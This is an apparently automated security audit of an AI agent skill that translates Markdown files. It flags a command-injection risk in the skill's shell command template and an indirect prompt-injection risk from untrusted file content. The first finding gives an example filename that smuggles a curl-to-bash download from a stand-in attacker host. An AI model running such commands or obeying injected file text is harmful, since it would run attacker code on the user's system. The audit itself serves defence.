markdown-segment-translator
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- COMMAND_EXECUTION (HIGH): The skill instructions direct the agent to execute a shell command using a template:
python3 ... --input [输入文件]. This creates a command injection vulnerability because the[输入文件]placeholder is populated with user-provided input. If a user provides a filename containing shell metacharacters (e.g.,file.md; curl attacker.com/exploit | bash), the agent may execute arbitrary code on the host system.\n- PROMPT_INJECTION (LOW): The skill is vulnerable to Indirect Prompt Injection (Category 8). It reads content from untrusted Markdown files and interpolates it directly into a prompt for translation ([段落内容]) without delimiters or sanitization. This allows a malicious file to influence the agent's behavior during the translation process.\n - Ingestion points: External file content is read via the
Readtool and processed bysegment_tool.py.\n - Boundary markers: Absent. There are no markers or instructions to help the agent distinguish between its instructions and the data to be translated.\n
- Capability inventory: The skill has access to
Bash,Read, andWritetools, providing a broad surface for post-exploitation actions if an injection is successful.\n - Sanitization: No input validation or escaping is specified for the file content or the filename parameter.
Recommendations
- AI detected serious security threats
Audit Metadata